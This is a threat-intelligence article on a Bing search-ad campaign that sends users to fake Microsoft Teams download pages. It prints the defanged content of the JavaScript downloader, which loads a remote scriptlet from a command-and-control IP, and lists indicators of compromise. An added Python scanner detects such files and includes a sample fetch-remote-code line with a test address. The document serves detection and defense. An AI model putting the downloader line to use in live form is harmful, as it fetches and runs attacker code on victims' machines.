Unit 42 researchers Bradley Duncan and Zach Diehl uncovered a malicious campaign exploiting Bing search advertisements to deliver malware through deceptive websites impersonating legitimate software pages.
This alarming discovery highlights the growing trend of attackers leveraging legitimate platforms for malicious purposes.
Malicious Bing Ad Campaign
The researchers detected a malicious ad in Bing search results on Wednesday, January 22, 2025.
The ad redirected users to a fake Microsoft Teams download page, hosted on a domain under burleson-appliance[.]net, which had been registered just two days earlier, on January 20.

The campaign also targeted other popular software brands using similar tactics, with domains and subdomains designed to look authentic.
An analysis of the domains used in the campaign revealed their short-lived nature, a tactic used to evade detection. Sub-domains can be explored on threat analysis platforms like urlscan.
Attack Workflow
Users were redirected to a fraudulent Microsoft Teams page hosted at hxxps[:]//microsoft-teams-download.burleson-appliance[.]net, with another similar domain observed at hxxps[:]//microsoft.teams-live[.]com.

These fake sites prompted the download of a 72-byte JavaScript file named application_setup.js, which, though seemingly benign, served as a downloader for additional payloads.

The file, identified by the SHA256 hash 4bed34b1cd5663a5a857b3bbf81cc5413c61cb561e9a90067b57da08b01ae70b, contained the content: GetObject("scriptlet:hxxp[:]//5.252.153[.]241:80/api/file/get-file/264872");
Upon execution via wscript.exe, the script connected to a command-and-control (C2) server at 5.252.153[.]241. The infected host then repeatedly contacted that server to retrieve additional malicious files, including PowerShell scripts, DLLs, and executable files.
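For defenders triaging download folders or collected endpoint files, the following Python scanner is an added example, not code from Unit 42 or from this article. It flags Windows Script Host files that match the reported SHA256 or that load a remote scriptlet through GetObject(); the extension list, the 512-byte "tiny file" threshold, the extra script: moniker variant, and the sample line with a TEST-NET address are assumptions made for the example.

```python
import hashlib
import re
from pathlib import Path

# SHA256 of application_setup.js as reported on this page.
KNOWN_SHA256 = {"4bed34b1cd5663a5a857b3bbf81cc5413c61cb561e9a90067b57da08b01ae70b"}
# Extensions handled by Windows Script Host (assumed scope for this example).
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf"}
# Assumed triage threshold: the reported downloader was only 72 bytes.
TINY_BYTES = 512
# GetObject() with a script:/scriptlet: moniker that points at a remote URL.
MONIKER_RE = re.compile(
    r"""GetObject\s*\(\s*["']\s*(scriptlet|script)\s*:\s*(https?://[^"'\s)]+)""",
    re.IGNORECASE,
)

def decode(data: bytes) -> str:
    """Script Host also accepts UTF-16 files, so honour a BOM before matching."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16", errors="replace")
    return data.decode("utf-8", errors="replace")

def scan_text(text: str) -> list[tuple[str, str]]:
    """Return (moniker, url) pairs for every remote scriptlet load in text."""
    return [(m.group(1).lower(), m.group(2)) for m in MONIKER_RE.finditer(text)]

def scan_file(path: Path) -> dict:
    """Collect size, hash match and moniker hits for one file."""
    data = path.read_bytes()
    return {
        "path": str(path),
        "size": len(data),
        "tiny": len(data) <= TINY_BYTES,
        "known_hash": hashlib.sha256(data).hexdigest() in KNOWN_SHA256,
        "hits": scan_text(decode(data)),
    }

def scan_dir(root: str) -> list[dict]:
    """Report script files under root that match the hash or the moniker pattern."""
    findings = []
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.suffix.lower() in SCRIPT_EXTS:
            r = scan_file(p)
            if r["known_hash"] or r["hits"]:
                findings.append(r)
    return findings

# Constructed sample (TEST-NET address, not an indicator from the campaign).
SAMPLE = 'GetObject("scriptlet:http://192.0.2.10:80/api/file/get-file/1");'
```

Run scan_dir() against a Downloads directory or a folder of collected files; a finding that is both tiny and carries a remote moniker hit matches the shape of the downloader described above.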

Delivered payloads such as TeamViewer.exe and pas.ps1 were used collectively to establish persistence on the compromised system and execute further malicious actions.
The campaign established persistence by creating a shortcut in the Windows Startup directory.
For instance, a shortcut to TeamViewer.exe was added at C:\Users\[username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TeamViewer.lnk, ensuring the malicious program would execute each time the system started.
Technical Indicators
Category | Details |
---|---|
C2 Server | 5.252.153[.]241 |
Malicious Domains | microsoft-teams-download.burleson-appliance[.]net<br>microsoft.teams-live[.]com |
Key Files Delivered | TeamViewer.exe (4,380,968 bytes): Used as a persistence mechanism.<br>pas.ps1: Malicious PowerShell script for further exploitation.<br>TV.dll and other DLL files: Designed to interact with the main payload. |

The abuse of Bing search ads to deliver malware underscores the need for heightened vigilance when clicking on ads, even on reputable platforms.
Cybersecurity professionals and users alike are urged to:
- Verify URLs before downloading applications.
- Avoid clicking on ads in search results when seeking software. Instead, navigate directly to official websites.
- Deploy endpoint detection and monitoring tools to identify and block unusual behaviors, such as unauthorized script execution or unexpected outbound connections.
This malicious advertising campaign demonstrates the sophistication of modern threat actors. By blending into trusted search engine platforms and mimicking well-known brands like Microsoft, attackers increase their chances of successfully deceiving users.
It is crucial for organizations and individuals to remain vigilant and implement layered security measures to defend against these evolving threats.